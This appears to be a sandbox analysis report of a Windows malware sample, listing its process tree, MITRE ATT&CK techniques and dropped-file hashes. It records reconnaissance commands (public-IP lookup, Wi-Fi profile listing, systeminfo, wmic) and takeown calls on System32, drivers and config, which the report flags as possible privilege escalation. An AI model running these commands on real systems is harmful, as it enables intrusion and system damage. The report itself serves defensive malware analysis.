"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:24244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:24256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1520,14659786182631113732,7070229631945644940,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3
4⤵
- Loads dropped DLL
PID:22680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:24320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:24352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,4234459850007572358,16339153956730811334,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1888 /prefetch:2
4⤵
- Loads dropped DLL
PID:23708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,4234459850007572358,16339153956730811334,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
4⤵
- Loads dropped DLL
PID:23388

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:24400

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:20636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
- Loads dropped DLL
PID:22708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
- Loads dropped DLL
PID:22728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,4204640615823794734,2733067763764053796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
4⤵
- Loads dropped DLL
PID:8312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
- Loads dropped DLL
PID:22228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
- Loads dropped DLL
PID:23264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,4233366405086111135,7810566922319644603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1652 /prefetch:3
4⤵
PID:13576

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
- Loads dropped DLL
PID:22004

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
- Loads dropped DLL
PID:14108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
- Loads dropped DLL
PID:23688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
- Loads dropped DLL
PID:23964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,2239920363322005225,11078287560578520215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3
4⤵
- Loads dropped DLL
PID:11732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
- Loads dropped DLL
PID:23584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
- Loads dropped DLL
PID:24476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1492,8354236930272232821,8125013287377721508,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 /prefetch:3
4⤵
- Loads dropped DLL
PID:4960

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
- Loads dropped DLL
PID:9048

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
- Loads dropped DLL
PID:8880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
- Loads dropped DLL
PID:8820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
- Loads dropped DLL
PID:8788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1796,1049351324298070068,3805734266758633457,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 /prefetch:3
4⤵
PID:25100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
- Loads dropped DLL
PID:8404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
- Loads dropped DLL
PID:21752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,17147463449583749590,13728320122905756133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:3
4⤵
PID:25264

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
- Loads dropped DLL
PID:1564

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
- Loads dropped DLL
PID:16548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
- Loads dropped DLL
PID:24608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
- Loads dropped DLL
PID:24620

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,11346477958877710201,12036428106230900990,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:3
4⤵
PID:25472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:24800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:24824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,6272842872188295461,15688504740582368700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 /prefetch:3
4⤵
PID:25580

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:24812

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:25432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:24736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:24748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:24672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:24600

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:25180

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:25576

C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
2⤵
PID:1852

C:\Windows\system32\netsh.exe
netsh wlan show profiles
2⤵
PID:3188

C:\Windows\system32\ipconfig.exe
ipconfig
2⤵
- Gathers network information
PID:3964

C:\Windows\system32\ipconfig.exe
ipconfig
2⤵
- Gathers network information
PID:3188

C:\Windows\system32\find.exe
find /i "IPv4"
2⤵
PID:2616

C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get size
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3792

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
2⤵
PID:5712

C:\Windows\system32\systeminfo.exe
systeminfo
2⤵
- Gathers system information
PID:4044

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6100

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:10340

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\config
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:10500

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\spool
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:11112

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\Fonts
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:11232

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4624

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\config
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:10624

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\config\systemprofile\AppData\Local
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:10928

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\config\systemprofile\AppData\Roaming
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:10828

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4964

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2716

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:17116

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5836

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:21940

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:22472

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
- Loads dropped DLL
PID:14784

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
- Loads dropped DLL
PID:8436

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:20596

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:3032

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:1104

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
Filesize
150B

MD5
e50239d1abbc36902f83a37741d5d0d5

SHA1
3a368766bf860685c974a7ae971c75ace0ff0862

SHA256
2e24565ee6bfe094f9d9113864a061cd1ed6763d1543a77798f5ab308a7b51bc

SHA512
a8d737f7dee59203ae6d37251fcc2a4cfce5ec5708d7fa3d546101d8081c1ff6e9f08094d2b0ca4b067ce874ad142ef2382a8b7d812367118f9c54903e30b254

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\7d7588ce-9a8e-405a-9226-f371e2b500df.dmp
Filesize
4.1MB

MD5
2677a0fca9cc94a612bc128f9497bd92

SHA1
65a271500c7005f450ed21974d39398479ab799b

SHA256
be3628f5ed3b9a95f3e5f5082b39a2c8ae6d3df623761b76045512be31034133

SHA512
714b926ec3e694844ebf1f58732d39abc628c75e2bb8fc81b159b92fe7ce5db3e99986334bdf84c81cc4c8e6f235d1ab74263519dedc0988fc768e56334401dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\932c914b-5247-4dcc-8ffc-908231308ad1.dmp
Filesize
4.2MB

MD5
85d00f6e2d74a9d95152056e2fb6b3b7

SHA1
9f71a7c728c0323563afc6d3dcd2a84060d3e272

SHA256
31a75abf6a4ae2b955012ccaa818967a1a3d76c3f18bc877623b47564814d6f4

SHA512
c81c548aa7414b193195b9196d2066dde62100b38f91bf36c9f5ed90997ae0eeff63d0cc47e027ec54ba095080d135eb1318b0918ce9a6ea09efed15ca475ac8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
439b5e04ca18c7fb02cf406e6eb24167

SHA1
e0c5bb6216903934726e3570b7d63295b9d28987

SHA256
247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654

SHA512
d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
a8e767fd33edd97d306efb6905f93252

SHA1
a6f80ace2b57599f64b0ae3c7381f34e9456f9d3

SHA256
c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb

SHA512
07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
5972f2b4a2012efd0d2dc230074abd33

SHA1
3425bc896219214ef3bc48f167760ac828f9f79e

SHA256
0b55c9de70d444000cb6d0c9117a9fe7af2beb0654e2aa2a8ccf2ddf7ada84bf

SHA512
71fe4271bea939055dda814c49e5384994f03aac4b2d08cd4ef24c29b89d4c4df964f3b2139ac570bc8acb475d4abdd920da444c7286713f83d9376069c53f9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
25643af4c3bf597ea316f3e0c9f6d27f

SHA1
b863bd684e9ee958367c338510ce5ef75dd192d5

SHA256
3a49dc590224c34dfa3a4230a077804671d9b6b0f8d3f429bb5defd29c02c84b

SHA512
6e7e1b838ad3db3189f424fe91a58df4f5ef0e2389dc50173c59785a3054537042224d1c286b450426b8b5ad1ddbf349fd9f82e33a08b2331255bdc0ed276851

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
ce12fb139b1d22956332d1f8bdbbff6a

SHA1
8e74d74f716a7900779d69064f7f39defbd31794

SHA256
ed9fd56465cb99e9eb958142fbce24dbecfe04091b3e21a494bfd2c2efa6fb42

SHA512
9c6e9d414d5688ea8bac3454547e2a09c2236b004be3987c1ca366134cb60809863101578e6e3b332d10eab91b509aa8da118e1fa3fb273068557ee02db3e107

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
8e541bb6152771151cee35ece0ed6dc5

SHA1
9455415b06dbd11b28b0a7e6b9ddfadc0b6c3b4c

SHA256
4c4bf45096b1439ac644d583638757a0045144e4ba94ed555530dc089a03621c

SHA512
7b3092f797c7759ddf3eca6982f387f1a4731227dfd220a8bd64331fb57e3f62537e76d3836907f529ea7ae1033a9b854a110cb9b944697d70e27f72cbf02b91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
d3f6695865820d6a500942d16fea41df

SHA1
0b7b669bb2f4e9d222f028ebd4c3737cde207ca5

SHA256
5dc8bea81a03dce1011c40d0146d93a9e9b24cc3cb8eb1a2d51ffbd8f77df23b

SHA512
05bd21756bc06c1980b1e54be20714d722f9eecfc575a8d27dd7a24e8ebf237b6547092f1afe39d514d61b30ff6efb909e768ef624d054da0a296d84b50a918c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
2531788670b1b9e9ea2a37f14fee6648

SHA1
438237501a6c7624d46701636874392d56d32204

SHA256
075d66ef5eeb4830f6d46b252cfc8fe463adc3e4bbe804c8f7dc4ec28de0d5ee

SHA512
cc6ff520aa8f517850d4ad0a393c35304ae162eb45aebbd33d3b3a299b8a42bbd2d0628dc1b6c4affd07448c4977a3bd098a8bda42cf2c3961519df79fd68a05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
1ee28fc08a87e8b1e8f0f0761894405a

SHA1
c8cad79b704d35b5e6620a0b119ad834997fae07

SHA256
2e4fbfc09a91090461c8625df2b8fb878a799317426929c2de6ab4316b84767d

SHA512
